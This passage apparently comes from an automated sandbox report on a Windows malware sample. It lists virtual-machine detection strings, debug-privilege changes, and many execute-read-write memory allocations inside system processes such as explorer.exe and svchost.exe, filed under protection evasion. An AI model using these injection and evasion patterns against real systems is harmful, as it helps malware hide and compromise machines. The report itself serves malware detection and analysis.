        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%
        Source: SearchApp.exe, 0000001F.00000000.1544462524.000001CE197F6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=wr
        Source: SearchApp.exe, 0000001F.00000000.1590741576.000001D62DB50000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w1
        Source: Amcache.hve.9.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
        Source: SearchApp.exe, 0000001F.00000000.1544462524.000001CE197F6000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000001F.00000000.1555939936.000001D61A6EA000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000001F.00000000.1560794643.000001D61AF90000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000001F.00000000.1567585983.000001D61C5A7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
        Source: SearchApp.exe, 0000001F.00000000.1541611507.000001CE194D6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmware workstation 12 player
        Source: SearchApp.exe, 0000001F.00000000.1632187010.000001D633567000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware.Workstation.vmui
        Source: Amcache.hve.9.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
        Source: Amcache.hve.9.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
        Source: svchost.exe, 00000017.00000000.1450883353.000001697A687000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000001F.00000000.1536735116.000001CE13FAA000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: smartscreen.exe, 00000022.00000002.2517306215.0000014226A3F000.00000004.00000020.00020000.00000000.sdmp, smartscreen.exe, 00000022.00000000.1657485333.0000014226A3F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW$
        Source: SearchApp.exe, 0000001F.00000000.1632187010.000001D633567000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware.Workstation.vmplayer
        Source: smartscreen.exe, 00000022.00000002.2517306215.00000142269A3000.00000004.00000020.00020000.00000000.sdmp, smartscreen.exe, 00000022.00000000.1657485333.00000142269A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP0
        Source: SearchApp.exe, 0000001F.00000000.1541611507.000001CE194D6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmware workstation 12 playervegas pro 12.0 (64-bit)
        Source: SearchApp.exe, 0000001F.00000000.1555939936.000001D61A6EA000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: nhttps://r.bing.com/rp/LisgCZCwGQ4lRz4go9tlwPslw_k.br.js;path=/;secure;SameSite=Noneq7CbsJ&or=whttps://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=wr
        Source: Amcache.hve.9.drBinary or memory string: vmci.syshbin`
        Source: Amcache.hve.9.drBinary or memory string: \driver\vmci,\driver\pci
        Source: Amcache.hve.9.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
        Source: SearchApp.exe, 0000001F.00000000.1628437057.000001D63285E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\VMware\VMware vCenter Converter Standalone\converter.exe
        Source: SearchApp.exe, 0000001F.00000000.1584218780.000001D62D7B0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w O|-
        Source: explorer.exe, 0000001B.00000002.4124666902.00000000087C0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTVMWare
        Source: SearchApp.exe, 0000001F.00000000.1632225446.000001D63356A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware.View.Client33
        Source: svchost.exe, 00000017.00000000.1450927769.000001697A6A9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @os=windows; osVer=10.0.19045.2006; lcid=en-GB; deviceType=9; deviceModel=VMware, Inc./VMware20,1;
        Source: Amcache.hve.9.drBinary or memory string: VMware-42 27 c7 3b 45 a3 e4 a4-61 bc 19 7c 28 5c 10 19
        Source: Amcache.hve.9.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
        Source: explorer.exe, 0000001B.00000002.4124666902.00000000087C0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000d
        Source: svchost.exe, 00000017.00000000.1450773187.000001697A665000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $@os=windows; osVer=10.0.19045.2006; lcid=en-GB; deviceType=9; deviceModel=VMware, Inc./VMware20,1;
        Source: SearchApp.exe, 0000001F.00000000.1555939936.000001D61A6EA000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=wP
        Source: explorer.exe, 0000001B.00000000.1468114321.0000000000A44000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
        Source: C:\Users\user\AppData\Local\Temp\YMZwp.exeAPI call chain: ExitProcess graph end nodegraph_9-1024
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeCode function: 6_2_0042B220 LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,FreeLibrary,FreeLibrary,LoadTypeLib,LoadTypeLib,RegisterTypeLib,UnRegisterTypeLib,6_2_0042B220
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeCode function: 6_2_00638044 mov eax, dword ptr fs:[00000030h]6_2_00638044
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeCode function: 6_2_00450D00 GetProcessHeap,OleInitialize,GetModuleFileNameA,SetCurrentDirectoryA,LoadCursorA,GetStockObject,GetCurrentThreadId,6_2_00450D00
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeProcess token adjusted: DebugJump to behavior

        HIPS / PFW / Operating System Protection Evasion

        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: F10000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: 190000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\dwm.exe base: 660000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\sihost.exe base: D20000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\svchost.exe base: 3F0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\svchost.exe base: 8D0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: 7F0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\explorer.exe base: 7480000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2E0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: A30000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 620000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Memory allocated: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: 160000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: A80000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 980000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Memory allocated: C:\Windows\System32\smartscreen.exe base: 890000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Memory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: F70000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Memory allocated: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 1A0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 9A0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Memory allocated: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: AA0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Memory allocated: C:\Windows\SysWOW64\cscript.exe base: 4980000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Memory allocated: C:\Windows\SysWOW64\cscript.exe base: 49E0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Memory allocated: C:\Windows\System32\conhost.exe base: 590000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Memory allocated: C:\Windows\System32\conhost.exe base: 570000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Memory allocated: C:\Windows\System32\backgroundTaskHost.exe base: BC0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: BE0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe Memory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 6B0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: D60000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 25E0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2640000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2D40000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2D50000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2B10000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2C60000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 11E0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 11F0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 11D0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 11E0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 670000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 680000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 810000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 820000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 14A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 14B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: E60000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: E70000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 8B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 8C0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 860000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 870000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 24A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 24F0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 9B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: A00000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: AF0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: B00000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: B00000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: B10000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: D20000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: D30000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 1260000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 1270000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: FB0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: FC0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: E50000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: E60000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 12A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 12B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2080000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2090000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2F50000 protect: page execute and read and writeJump to behavior
